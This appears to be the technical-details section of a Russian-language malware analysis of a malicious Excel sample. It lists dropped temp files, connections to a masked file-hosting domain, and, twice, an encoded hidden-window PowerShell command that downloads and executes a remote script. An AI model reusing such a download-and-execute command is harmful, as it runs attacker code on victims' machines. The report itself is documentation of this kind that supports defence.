Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAAkAaAB0AHQAcABzADoALwAvAHQAbQBwAGYAaQBsAGUAcwAuAG8AcgBnAC8AZABsA...
- %TEMP%\abca.tmp
- <Текущая директория>\49d31000
- %TEMP%\e274.tmp
- %TEMP%\abca.tmp
- %TEMP%\e274.tmp
- <PATH_SAMPLE>.xls
- 'tm###les.org':443
- 'tm###les.org':443
- DNS ASK tm###les.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAAkAaAB0AHQAcABzADoALwAvAHQAbQBwAGYAaQBsAGUAcwAuAG8AcgBnAC8AZABsA...' (со скрытым окном)